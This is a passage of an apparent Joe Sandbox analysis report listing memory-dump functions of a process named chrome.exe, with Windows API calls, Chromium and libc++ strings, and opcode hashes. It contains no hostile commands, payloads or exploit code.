                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\base\files\file_win.cc$Close$GetHandleVerifier$ScopedBlockingCall
                                                    • API String ID: 1646373207-3663164917
                                                    • Opcode ID: 0d6c60b5543329515dbe9c90c412d09d01b704a17ccfb97247c614b5437367be
                                                    • Instruction ID: b65dd176a36bfcbc0341f4c9e71d3d16f6c367c222f34a31526e2c02bb39facb
                                                    • Opcode Fuzzy Hash: 0d6c60b5543329515dbe9c90c412d09d01b704a17ccfb97247c614b5437367be
                                                    • Instruction Fuzzy Hash: D6310871600348AFD700AF65DC85A7AB7E4FB89300F144D29F6C6AB252E770A948CB72
                                                    APIs
                                                    Strings
                                                    • true, xrefs: 00E72729
                                                    • FeatureList-feature-accessed-too-early, xrefs: 00E727C9
                                                    • FeatureList-early-access-allow-list, xrefs: 00E72809
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E7279B
                                                    • false, xrefs: 00E7272E, 00E72763
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$FeatureList-early-access-allow-list$FeatureList-feature-accessed-too-early$false$true
                                                    • API String ID: 4218353326-219429426
                                                    • Opcode ID: 2343389377b14dabf6bffa2b464a1e6d04414f364a034d3d23f4064885eb22d4
                                                    • Instruction ID: 3681fa4006c1cebc72d110484b5b58b5378db98ae27a2052d77c1d16c17a5402
                                                    • Opcode Fuzzy Hash: 2343389377b14dabf6bffa2b464a1e6d04414f364a034d3d23f4064885eb22d4
                                                    • Instruction Fuzzy Hash: 0D3106F1D002059FCB14EF65ED82ABB77A1EBC5710F15612AE6057B2D1EB312905CAB2
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,FFFFFFFF,00000000,?,00D40EE9,no-periodic-tasks,00000004), ref: 00D4216F
                                                    • CreateEventW.KERNEL32 ref: 00D42204
                                                    • GetLastError.KERNEL32 ref: 00D4221A
                                                    • SetLastError.KERNEL32 ref: 00D4223E
                                                    Strings
                                                    • ExitCodeWatcherThread, xrefs: 00D4219D
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D42277
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$CreateCurrentEventProcess
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$ExitCodeWatcherThread
                                                    • API String ID: 2886518480-2863599117
                                                    • Opcode ID: 94505deacf5d584f71c3dd2b2ce1c8597b476f3720e32f208e271c8f92d6f6ab
                                                    • Instruction ID: 1e85f9e2829d7f6cf212057f4ada357a8bab8647ffb4dd262ddbbe970be24ed1
                                                    • Opcode Fuzzy Hash: 94505deacf5d584f71c3dd2b2ce1c8597b476f3720e32f208e271c8f92d6f6ab
                                                    • Instruction Fuzzy Hash: 9C3124709047488FD700EF78D48936EBBF0FF85304F04891EE482AB211DBB4A589CB92
                                                    APIs
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00DF5F61,00000000,00000001,?,?,?,?,?,?), ref: 00DF6411
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00DF6423
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DF6443
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DF64A0
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DF64AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressCreateEventHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 687412823-1090674830
                                                    • Opcode ID: d69b115bebd7f763320509e5099817479534807e19959d298b0de9ae40dbdc41
                                                    • Instruction ID: 752a942f21b8d11e8016a44a3132b6ea40a3762a5843e4b3e54f60b0a37c5467
                                                    • Opcode Fuzzy Hash: d69b115bebd7f763320509e5099817479534807e19959d298b0de9ae40dbdc41
                                                    • Instruction Fuzzy Hash: ED21B1706043099FD720AF74DC89B3A7BA8FB44300F158829F686EB650E635E848CB71
                                                    APIs
                                                    • GetThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D4154B
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000001), ref: 00D415CE
                                                    • CloseHandle.KERNEL32(?), ref: 00D415D9
                                                    • GetLastError.KERNEL32 ref: 00D415FE
                                                    Strings
                                                    • ..\..\base\threading\platform_thread_win.cc, xrefs: 00D4159C
                                                    • Join, xrefs: 00D415A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseErrorHandleLastObjectSingleThreadWait
                                                    • String ID: ..\..\base\threading\platform_thread_win.cc$Join
                                                    • API String ID: 813778123-1746769387
                                                    • Opcode ID: fcc2959ed826c3194988e714e5402ba3c1077c97dfb9fbea8d7032d62ea954eb
                                                    • Instruction ID: dc7b4aff26f823be74a33f5518be00417de7efc751887f0ce682abb02f8d379a
                                                    • Opcode Fuzzy Hash: fcc2959ed826c3194988e714e5402ba3c1077c97dfb9fbea8d7032d62ea954eb
                                                    • Instruction Fuzzy Hash: 8C2123B49043449FD710AF20DC859AFB7F8EFC6750F040A2DF9D2A7291E770D68886A2
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00E74480,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00D41858
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,00E74480,?,?,?,?,?,?,?,?,?), ref: 00D41878
                                                    • GetCurrentProcess.KERNEL32(?,?,00E74480,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00D41882
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00E74480,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00D418D7
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D418E3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressCurrentHandleModuleProcProcess
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 2162457882-1090674830
                                                    • Opcode ID: a7ef55b135d5e7ea9f7fcb4139932c0aac2e2a06b6af8ad658279f8097bb9eee
                                                    • Instruction ID: 3959618737b918a915e8cb0ac9d6ab753e57e094d947e64023131886b4aec7e6
                                                    • Opcode Fuzzy Hash: a7ef55b135d5e7ea9f7fcb4139932c0aac2e2a06b6af8ad658279f8097bb9eee
                                                    • Instruction Fuzzy Hash: 3421A778600345AFDB109F65DC89B6A7BF4EB49301F180439F546EB361D7719888CB71
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,00E4418D,E0000008,00E57B4F,?,E0000008,E8226A54,?,00E44018,00000019,AppPolicyGetProcessTerminationMethod,00EC5560,AppPolicyGetProcessTerminationMethod,E0000008), ref: 00E4413F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3664257935-537541572
                                                    • Opcode ID: 7a688da782ad1be40b6d47287851ce6ff4407921054238bddf6bf8b9137d16d7
                                                    • Instruction ID: ff255f8f4bfe774b3ad46a0d763f157de1411f2612dd8087865584ee1695d4a3
                                                    • Opcode Fuzzy Hash: 7a688da782ad1be40b6d47287851ce6ff4407921054238bddf6bf8b9137d16d7
                                                    • Instruction Fuzzy Hash: C4212BB1B02215AFC7229B65BC84F9A37A8AB617A4F251125F912B73C0DB30FD44C6D0
                                                    APIs
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0CE7C
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,00D6EE40,00000000), ref: 00E0CEBC
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0CF66
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0CF9B
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,?,00000000), ref: 00E0D0EF
                                                    • InitOnceExecuteOnce.KERNEL32(00EFEDFC,00D53CB0,00D6EE40,00000000), ref: 00E0D12B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Once$ExecuteInit
                                                    • String ID:
                                                    • API String ID: 689400697-0
                                                    • Opcode ID: d7abe9640483ca8049a6ecd72fa1faec0c58290d84741567c5271fcbd7f4c37b
                                                    • Instruction ID: f61df507034f96425f34b2d109698c12936117532e174e6e00b1e54c8c6bc59a
                                                    • Opcode Fuzzy Hash: d7abe9640483ca8049a6ecd72fa1faec0c58290d84741567c5271fcbd7f4c37b
                                                    • Instruction Fuzzy Hash: C2B1E271D043599FDB10CFA4CC49BAEBBB4FB55304F145619E808BB291E7B0A5C4C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4728101415d44b7fbae8fbd95761aa6f5919ec2f75bfd3bcd3cf7e7bbd80eaed
                                                    • Instruction ID: cc01f55baf298e371e66edd62a5c72a55946c49433fd3097b71b245f94eec3f6
                                                    • Opcode Fuzzy Hash: 4728101415d44b7fbae8fbd95761aa6f5919ec2f75bfd3bcd3cf7e7bbd80eaed
                                                    • Instruction Fuzzy Hash: C6414F756002068FD729DF25C888E26B7F2BF9831171D886CE9969B761E731FC46CB60
                                                    APIs
                                                    • AcquireSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36504
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36536
                                                    • AcquireSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36557
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF3714), ref: 00D36567
                                                    • WakeAllConditionVariable.KERNEL32(00EF3718), ref: 00D36572
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF3714), ref: 00D3658E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Release$Acquire$ConditionVariableWake
                                                    • String ID:
                                                    • API String ID: 2445866386-0
                                                    • Opcode ID: f77c9e8ebe76e02bd3ecca0925979f81b4d889079975c5f0ce72ded9a1c25917
                                                    • Instruction ID: 643f3223fb97af9a25a9a1a1a18fa12fccb642255093e0b552382ccf5466fc50
                                                    • Opcode Fuzzy Hash: f77c9e8ebe76e02bd3ecca0925979f81b4d889079975c5f0ce72ded9a1c25917
                                                    • Instruction Fuzzy Hash: 5E21D5B5500349EFCB00AF69DC89A9ABBB0FB45714F04413AF800AB391D3749904CBB2
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D32145
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00D31E30,?,?,00D31FBD,00D31E30,?,?,00D31E30), ref: 00D3214F
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00D31E30,?,?,00D31FBD,00D31E30,?,?,00D31E30), ref: 00D321E4
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D32407
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D32486
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$CurrentReleaseThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 1385397084-2888085009
                                                    • Opcode ID: 5cf43fc63e3667046820ce15e432372279cd5da413130de114c934efaa1f7fcf
                                                    • Instruction ID: 000934980df417f578725c48cd080feccdaec09af7c4c260d0f7d53a01e1c17d
                                                    • Opcode Fuzzy Hash: 5cf43fc63e3667046820ce15e432372279cd5da413130de114c934efaa1f7fcf
                                                    • Instruction Fuzzy Hash: 08C17C75E002059FCB14CF69D880ABABBF5FF59310F188169E84AAB351E730ED55CBA1
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D3C1F5
                                                    • SetThreadPriority.KERNEL32(00000000,00010000), ref: 00D3C207
                                                      • Part of subcall function 00E54320: GetCurrentThread.KERNEL32 ref: 00E54323
                                                      • Part of subcall function 00E54320: GetThreadPriority.KERNEL32(00000000,?,00ED1384,..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds,?,00000000,?,00D3BC66,?,?,?,?,?,?,?,?), ref: 00E5432A
                                                    • SetThreadPriority.KERNEL32(00000000,7FFFFFFF), ref: 00D3C21D
                                                    • GetCurrentThread.KERNEL32 ref: 00D3C23A
                                                    • SetThreadInformation.KERNEL32(00000000,00000003,?,0000000C), ref: 00D3C246
                                                    • SetThreadPriority.KERNEL32(00000000,00020000), ref: 00D3C263
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$Priority$Current$Information
                                                    • String ID:
                                                    • API String ID: 2516384554-0
                                                    • Opcode ID: 9896f1d559123edf124816d07b2180067a66e335015285f45189c60a4c1acfc3
                                                    • Instruction ID: a0170cf4f23d8f3b7a661d75ae2e3b76460f6a8f86fdd6b91963d2ba844ad377
                                                    • Opcode Fuzzy Hash: 9896f1d559123edf124816d07b2180067a66e335015285f45189c60a4c1acfc3
                                                    • Instruction Fuzzy Hash: D8012BB5A002045FC7109F75EC58A5F7BF5EF44361F04052DF516BB2D0EB30A5448B55
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D38ECE
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00D38ED9
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D38EEE
                                                    Strings
                                                    • ..\..\base\task\sequence_manager\task_queue_impl.cc, xrefs: 00D38D29
                                                    • PushOntoDelayedIncomingQueue, xrefs: 00D38D2E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: ..\..\base\task\sequence_manager\task_queue_impl.cc$PushOntoDelayedIncomingQueue
                                                    • API String ID: 1678258262-2027707633
                                                    • Opcode ID: 6b741e861a32e0b844c20bc3c028b250c9f76d5aa7e54b95466ac8e19833284c
                                                    • Instruction ID: 4a099bf2e25e5caa07d42df35499b50d5fe30b7dee04ba2559da8ad0877d5475
                                                    • Opcode Fuzzy Hash: 6b741e861a32e0b844c20bc3c028b250c9f76d5aa7e54b95466ac8e19833284c
                                                    • Instruction Fuzzy Hash: 4791A1B0904B41CFC715CF29D480662BBF0FF99304B15969EE89A9B712E730F995DBA0
                                                    APIs
                                                    • CreateFileW.KERNEL32 ref: 00E9613F
                                                      • Part of subcall function 00E960C0: CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000000,00000080,00000000,?,00E96273), ref: 00E960EB
                                                    Strings
                                                    • CreateFile , xrefs: 00E96182, 00E962B0
